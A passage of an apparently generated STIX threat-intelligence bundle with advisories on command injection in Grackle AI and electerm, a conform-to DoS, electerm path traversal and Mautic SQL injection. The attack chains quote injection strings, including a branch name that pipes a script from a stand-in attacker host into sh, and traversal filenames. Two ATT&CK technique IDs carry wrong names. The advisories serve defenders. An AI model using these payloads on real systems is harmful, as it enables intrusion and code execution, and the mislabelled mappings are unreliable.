      "description": "## Overview\n\nA critical command injection vulnerability (GHSA-vv65-f55v-xm6g) affects Grackle AI's `@grackle-ai/runtime-sdk` and `@grackle-ai/powerline` components, specifically versions `0.132.1` and earlier. The flaw stems from the `NODE_GIT_EXECUTOR` utilizing `shell:true` when executing `git worktree` operations, combined with the unsanitized `branch` name flowing from the `SpawnSession` gRPC request into the command arguments. This allows a malicious or compromised agent, or any client able to initiate a task via the `SpawnSession` RPC, to inject arbitrary shell commands. These commands are then executed with the privileges of the PowerLine user on provisioned environments, including SSH hosts, Docker containers, and Codespaces, effectively enabling remote code execution and escaping the agent's sandbox. A secondary, less impactful, argument injection vulnerability also exists due to a missing `--` separator.\n\n## Attack Chain\n\n1.  An attacker gains the ability to make calls to the PowerLine `SpawnSession` gRPC RPC. This could be through a compromised agent within the victim's environment, a malicious internal actor, or by exploiting another external vulnerability that exposes this RPC.\n2.  The attacker crafts a Git branch name containing shell metacharacters and arbitrary commands, for example, `x;curl http://attacker/x.sh|sh;#` or `$(touch /tmp/pwned)`.\n3.  The attacker sends a `SpawnSession` gRPC request to the PowerLine server, providing the crafted malicious branch name as a parameter within the request payload.\n4.  The vulnerable `ensureWorktree` function, located in `packages/runtime-sdk/src/worktree.ts`, prepares to execute a `git worktree add` command using the `NODE_GIT_EXECUTOR.exec` function.\n5.  Due to the `shell:true` option being implicitly passed to `NODE_GIT_EXECUTOR.exec`, Node.js concatenates the `git` command and its arguments (including the malicious branch name) into a single string.\n6.  This concatenated string is then passed to `sh -c`, which interprets the shell metacharacters and executes the attacker's injected commands embedded within the branch name.\n7.  The injected commands (e.g., `curl` to download and execute a malicious script, `touch` for arbitrary file creation) are executed by the `sh -c` process with the privileges of the PowerLine user.\n8.  The attacker successfully achieves remote code execution, gaining control over the targeted provisioned environment (SSH host, Docker container, or Codespace) as the PowerLine user.\n\n## Impact\n\nSuccessful exploitation of this vulnerability leads to remote code execution (RCE) with the privileges of the PowerLine user on any provisioned environment where the Grackle AI runtime is deployed. This allows attackers to escape the agent sandbox, gain full control over the affected host (be it an SSH host, Docker container, or Codespace), and potentially access sensitive data, escalate privileges, or establish persistence within the victim's infrastructure. While no specific victim count or targeted sectors are mentioned, any organization utilizing Grackle AI's runtime-sdk in their development or deployment pipelines is at risk.\n\n## Recommendation\n\n*   Prioritize patching the affected Grackle AI components to address GHSA-vv65-f55v-xm6g by updating `@grackle-ai/runtime-sdk` and `@grackle-ai/powerline` beyond version `0.132.1`.\n*   Deploy the Sigma rule \"Detect GHSA-vv65-f55v-xm6g Grackle AI RCE via Git Worktree Injection\" to your SIEM and tune for your environment to identify potential exploitation attempts.\n*   Review the remediation steps for GHSA-vv65-f55v-xm6g which include removing `shell:true` from `NODE_GIT_EXECUTOR` and adding `--` separators for `git worktree add` invocations.\n*   Implement defense-in-depth measures by validating the `branch` parameter at the gRPC boundary in `grpc-server.ts` to reject names containing shell metacharacters or invalid Git ref rules.\n",
      "published": "2026-07-03T11:45:08Z",
      "labels": [
        "command-injection",
        "rce",
        "supply-chain",
        "nodejs",
        "git"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vv65-f55v-xm6g"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ab3c8c8c-9e26-5277-a2cd-66261a1722ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "@conform-to/dom Vulnerable to CPU Exhaustion via Crafted Form Submissions",
      "description": "## Overview\n\nA high-severity CPU exhaustion vulnerability, identified as CVE-2026-49250, has been discovered in the `@conform-to/dom` npm package, specifically within its `parseSubmission` future API. This vulnerability affects versions greater than or equal to 1.8.0 and less than 1.19.4. The issue arises when the API processes `FormData` or `URLSearchParams` submissions containing a large number of unique field names. An attacker can exploit this by sending a specially crafted submission, causing the parser to repeatedly scan submitted entries during value lookups. This inefficient processing leads to excessive synchronous CPU utilization on the server, ultimately resulting in CPU exhaustion and a denial of service (DoS) condition for the affected application. This vulnerability is critical for applications that accept untrusted or arbitrary form submissions.\n\n## Attack Chain\n\n1. An attacker identifies a web application using `@conform-to/dom`'s `parseSubmission` API for form processing.\n2. The attacker crafts a malicious HTTP POST request containing `FormData` or `URLSearchParams`.\n3. The crafted request includes a significantly large number of unique field names within its body.\n4. The victim application receives the request and invokes `parseSubmission` to process the incoming form data.\n5. During the parsing process, `parseSubmission` attempts to look up values by field name.\n6. Due to the high volume of unique field names, the parser repeatedly iterates through the entire list of submitted entries for each lookup.\n7. This repeated scanning consumes excessive synchronous CPU cycles on the server hosting the application.\n8. The prolonged CPU exhaustion leads to a denial of service (DoS) for the application, making it unresponsive or unavailable to legitimate users.\n\n## Impact\n\nThe primary impact of CVE-2026-49250 is a denial of service (DoS) condition for applications utilizing the vulnerable `@conform-to/dom` package. If successfully exploited, an attacker can render the web application unresponsive or completely unavailable by causing its CPU resources to be fully consumed. This can lead to significant operational disruption, financial losses due to service downtime, and reputational damage for affected organizations. Any application that processes untrusted form submissions using vulnerable versions of `@conform-to/dom` is at risk, irrespective of the industry sector.\n\n## Recommendation\n\n*   Upgrade the `npm/@conform-to/dom` package to version 1.19.4 or higher immediately to patch CVE-2026-49250.\n*   Implement request parsing limits *before* passing data to the Conform `parseSubmission` API. For multipart requests, utilize `@remix-run/form-data-parser` with options such as `maxParts`, `maxTotalSize`, `maxFileSize`, `maxFiles`, and `maxHeaderSize` to mitigate CPU exhaustion.\n",
      "published": "2026-07-03T11:44:10Z",
      "labels": [
        "vulnerability",
        "web-application",
        "denial-of-service",
        "cpu-exhaustion",
        "npm"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-525m-7f82-2mf7"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0f3900e9-9537-5c23-b5f2-f0be833d75eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fa838f1f-8dba-53bb-b1b2-06b6e0fff594",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b87a86a-4ae1-5fc5-8585-9afe03d13022",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fa838f1f-8dba-53bb-b1b2-06b6e0fff594",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da57aaf6-f1d1-5170-89f5-5e6174bf04ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fa838f1f-8dba-53bb-b1b2-06b6e0fff594",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fa838f1f-8dba-53bb-b1b2-06b6e0fff594",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "electerm Path Traversal Vulnerability in Zmodem and Trzsz Download Handling (CVE-2026-49253)",
      "description": "## Overview\n\nA significant path traversal vulnerability, tracked as CVE-2026-49253, has been identified in electerm, a popular terminal emulator. This flaw affects the Zmodem and Trzsz file download handlers in versions up to and including 3.11.0. The vulnerability stems from electerm's failure to sanitize remote-supplied filenames when combining them with the user-selected download directory path. This allows a malicious SSH server or remote shell process to provide filenames like `../escaped.txt`, effectively escaping the intended download directory. Consequently, files can be written to arbitrary locations on the user's filesystem, subject to the permissions of the electerm process. This could lead to severe consequences such as overwriting critical system files, altering user configuration, or deploying malicious payloads, posing a substantial risk to user data integrity and system security.\n\n## Attack Chain\n\n1.  An attacker establishes control over an SSH server or gains access to a remote shell session.\n2.  A user of electerm connects to this attacker-controlled SSH server.\n3.  The attacker initiates a Zmodem (`rz` or `sz`) or Trzsz (`trz` or `tsz`) file transfer protocol session.\n4.  During the transfer, the attacker supplies a specially crafted filename containing directory traversal sequences (e.g., `../../.bashrc`, `../escaped.txt`).\n5.  The electerm client receives the file transfer request and presents it to the user.\n6.  The user accepts the transfer and selects an intended download directory within electerm.\n7.  Due to the vulnerability in `path.join()`, electerm processes the unsanitized filename, causing the file to be written outside the user-selected download directory.\n8.  The malicious file is written to an arbitrary location on the user's filesystem, potentially overwriting sensitive configuration files, system binaries, or dropping new malicious executables, achieving data destruction or persistence.\n\n## Impact\n\nThis path traversal vulnerability poses a high risk to users of electerm. If exploited, an attacker could write arbitrary files to any location on the victim's filesystem where the electerm process has write permissions. This could lead to the overwrite or corruption of critical system files, user configuration files (e.g., `~/.bashrc`, `~/.ssh/authorized_keys`), or the injection of malicious scripts or binaries. The direct consequences include system instability, loss of data integrity, unauthorized access (if configuration files are tampered with), and potentially full system compromise. There is no specific victim count available, but all users running vulnerable versions of electerm are at risk, regardless of their sector.\n\n## Recommendation\n\n*   Immediately update electerm to a patched version to remediate CVE-2026-49253.\n*   Instruct users to avoid connecting to untrusted SSH servers.\n*   Advise users to reject or cancel any incoming Zmodem or Trzsz file transfers if they originate from untrusted sources.\n*   Educate users on the risks of using Zmodem (`sz`/`rz`) and Trzsz (`trz`/`tsz`) commands when interacting with untrusted or potentially compromised remote servers.\n",
      "published": "2026-07-03T11:38:43Z",
      "labels": [
        "path-traversal",
        "vulnerability",
        "client-side",
        "terminal-emulator",
        "file-transfer"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-38j7-23hf-9mhc"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/electerm/electerm/commit/fde153d677a170c5816368f6586647f3af4ef284"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2c14aa7c-0ad5-57e1-b454-79574c3cebda",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7dc647d-a6a1-5102-853d-378add8b9281",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5444608-6cd1-5de8-8a20-f4e25b615f25",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7dc647d-a6a1-5102-853d-378add8b9281",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--34af3ba6-d35a-5696-92b3-882984413c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7dc647d-a6a1-5102-853d-378add8b9281",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c7ea0b9d-b6f2-5760-88f2-5bf71bbd541a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7dc647d-a6a1-5102-853d-378add8b9281",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ab6c3a1-4583-5f4d-b87c-48cb453d62f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Automated Collection",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1119",
          "url": "https://attack.mitre.org/techniques/T1119"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b0d2ec4-522a-50d1-bb77-7d45b8ea4441",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7dc647d-a6a1-5102-853d-378add8b9281",
      "target_ref": "attack-pattern--5ab6c3a1-4583-5f4d-b87c-48cb453d62f5"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2ae4be5c-7257-5807-a24a-88347acacdd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7dc647d-a6a1-5102-853d-378add8b9281",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b82e923-dddd-5c77-a42c-4b7b19a66b20",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7dc647d-a6a1-5102-853d-378add8b9281",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c7dc647d-a6a1-5102-853d-378add8b9281",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "electerm has Command Injection in File System Operations (rmrf, mv, cp)",
      "description": "## Overview\n\nA critical command injection vulnerability (CVE-2026-49255) has been identified in electerm, a popular terminal emulator and SSH/SFTP client, affecting versions up to and including 3.11.0. The flaw resides within the application's file system operations, specifically `rmrf()`, `mv()`, and `cp()`, which are implemented in `src/app/lib/fs.js`. These functions construct shell commands by directly embedding user-controlled file paths without proper escaping of shell metacharacters. Attackers can exploit this by setting up a malicious SSH/SFTP server that presents files with specially crafted names containing metacharacters like `\"` or `'`. When a victim connects to such a server and performs file operations (such as remote-to-local transfers or renaming), the embedded shell metacharacters escape the intended argument, leading to arbitrary command execution on the victim's system under the context of the electerm user. This allows for potential data exfiltration, malware installation, or full system compromise on both Windows and POSIX (Linux/macOS) platforms.\n\n## Attack Chain\n\n1. An attacker sets up a malicious SSH/SFTP server or compromises an existing one, making it accessible to potential victims.\n2. The attacker crafts filenames containing shell metacharacters (e.g., `file\"$(touch /tmp/pwned)\"`, `malicious';id;'file`) designed to break out of quoted arguments in shell commands.\n3. A victim, using a vulnerable version of electerm, connects to the malicious SSH/SFTP server.\n4. The victim initiates a file operation (e.g., remote-to-local transfer, move, copy, or a rename due to conflict) involving the attacker-controlled malicious filename.\n5. electerm's vulnerable file system functions (`rmrf()`, `mv()`, or `cp()`) are invoked, attempting to process the malicious filename.\n6. The functions construct an underlying shell command by interpolating the malicious filename directly into a command string, failing to properly escape the shell metacharacters.\n7. The shell metacharacters (e.g., `\"` or `'`) in the filename escape the intended argument, causing the embedded arbitrary commands to be executed by the underlying shell.\n8. The injected arbitrary commands run with the privileges of the electerm desktop user, leading to arbitrary code execution, system compromise, or data exfiltration.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-49255 results in arbitrary command execution on the victim's system. This allows attackers to perform actions with the same privileges as the electerm desktop user, which typically includes access to user files and configuration. The consequences can include data exfiltration, installation of additional malware, further system compromise, or even the establishment of persistence. Both POSIX-based operating systems (Linux, macOS) and Windows are affected, widening the potential target base. The severity is high due to the ease of exploitation via crafted filenames and the direct impact of arbitrary code execution.\n\n## Recommendation\n\nPrioritized, concrete actions for detection engineering teams.\n*   Immediately upgrade electerm to a patched version (newer than 3.11.0) to remediate CVE-2026-49255.\n*   Deploy the Sigma rule provided in this brief to detect anomalous process creation that may indicate exploitation attempts.\n*   Educate users about the risks of connecting to untrusted SSH/SFTP servers and performing file operations with suspicious filenames, as highlighted in the \"Attack Chain\" section.\n*   Implement strong egress filtering to block unexpected outbound connections from user workstations that could indicate command and control activity post-exploitation.\n",
      "published": "2026-07-03T11:37:40Z",
      "labels": [
        "command-injection",
        "rce",
        "client-side",
        "application-vulnerability",
        "electerm"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "attack-pattern--5ab6c3a1-4583-5f4d-b87c-48cb453d62f5",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v5ff-xmfp-p245"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/electerm/electerm/commit/aa778818843b9c083bd711cd04644d102fcb5a42"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28361a1b-de35-5478-99f6-a6f29ba5d46a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a2214641-2e54-515f-b331-7fd359972b2b",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1213",
          "url": "https://attack.mitre.org/techniques/T1213"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2685b988-e2d5-513c-b099-6214bfdfe691",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a2214641-2e54-515f-b331-7fd359972b2b",
      "target_ref": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6b7b86a9-346d-5b18-8c55-2d4bd08889f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1580",
          "url": "https://attack.mitre.org/techniques/T1580"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--19d6bf8f-254c-5eb8-94fc-45f551802ad5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a2214641-2e54-515f-b331-7fd359972b2b",
      "target_ref": "attack-pattern--6b7b86a9-346d-5b18-8c55-2d4bd08889f8"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a2214641-2e54-515f-b331-7fd359972b2b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Mautic API SQL Injection Vulnerability (CVE-2026-4776)",
      "description": "## Overview\n\nA critical SQL injection vulnerability (CVE-2026-4776) has been identified in Mautic, an open-source marketing automation platform. This flaw specifically impacts the API contact filtering mechanism, stemming from inadequate recursive sanitization of nested query parameters. Attackers can exploit this by crafting malicious API requests containing SQL injection payloads, which bypass Mautic's input filtering. The vulnerability allows an authenticated user with API access to execute arbitrary SQL commands against the underlying database. This could lead to unauthorized retrieval of sensitive information, including user credentials, system configurations, and personally identifiable information (PII) of contacts, thereby compromising data confidentiality and integrity. The issue affects Mautic versions from 2.6.0 up to 4.4.13, and specific ranges within 5.x, 6.x, and 7.x, with patches released in versions 7.1.2, 6.0.9, 5.2.11, and 4.4.20.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker obtains valid credentials for a Mautic user account with API access permissions.\n2.  **API Request Crafting**: The attacker crafts a specially malformed API request targeting Mautic's contact filtering endpoint (e.g., `/api/contacts`).\n3.  **SQL Payload Injection**: The malicious request includes an SQL injection payload embedded within nested query parameters, designed to bypass Mautic's existing input sanitization for CVE-2026-4776.\n4.  **Backend Processing**: Mautic's API processes the request, and due to the vulnerability, fails to properly sanitize the injected SQL commands.\n5.  **SQL Execution**: The unsanitized SQL payload is executed directly against the backend database server (e.g., MySQL, PostgreSQL).\n6.  **Data Exfiltration**: The malicious SQL query extracts sensitive information from the database, such as administrator credentials, system configurations, or PII.\n7.  **Data Retrieval**: The extracted sensitive data is returned as part of the legitimate API response, allowing the authenticated attacker to retrieve it.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-4776 grants an authenticated user with API access the ability to execute arbitrary SQL queries against Mautic's backend database. This has severe implications, as it enables unauthorized access and retrieval of sensitive database contents. This includes, but is not limited to, user credentials (potentially including hashed passwords), critical system configurations, and all personal identifiable information (PII) stored for marketing contacts. This bypasses standard data access permissions, potentially exposing millions of records in larger Mautic deployments and leading to significant data breaches, reputational damage, and regulatory penalties.\n\n## Recommendation\n\n*   **Patch CVE-2026-4776 immediately**: Upgrade Mautic to one of the patched versions: 7.1.2, 6.0.9, 5.2.11, or 4.4.20.\n*   **Implement WAF rules**: Deploy a Web Application Firewall (WAF) and configure rules to detect and block common SQL injection patterns, especially those targeting query parameters of Mautic API endpoints as outlined in the Sigma rule.\n*   **Restrict API access**: If immediate patching is not possible, temporarily disable Mautic API access or restrict API permissions to only highly trusted accounts as a mitigation described in the brief.\n*   **Monitor webserver logs**: Deploy the provided Sigma rule to your SIEM to detect attempts to exploit CVE-2026-4776 by monitoring your webserver logs for suspicious API requests.\n",
      "published": "2026-07-03T11:36:30Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "mautic",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
        "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
        "attack-pattern--6b7b86a9-346d-5b18-8c55-2d4bd08889f8"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-fcmw-wx57-9p75"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5d1b769-a6df-5393-a930-da1e423482f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d9fee895-d404-52e3-9a72-cf67f673441b",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--01908d24-a5da-535b-80ae-a23fb05844cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d9fee895-d404-52e3-9a72-cf67f673441b",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--84ba1451-00c0-5280-811d-c1fb72756b75",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d9fee895-d404-52e3-9a72-cf67f673441b",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d9fee895-d404-52e3-9a72-cf67f673441b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Grackle AI MCP Tool Layer Fail-Open Authorization Leads to IDOR and Privilege Escalation (GHSA-f9ff-5x35-7gfw)",
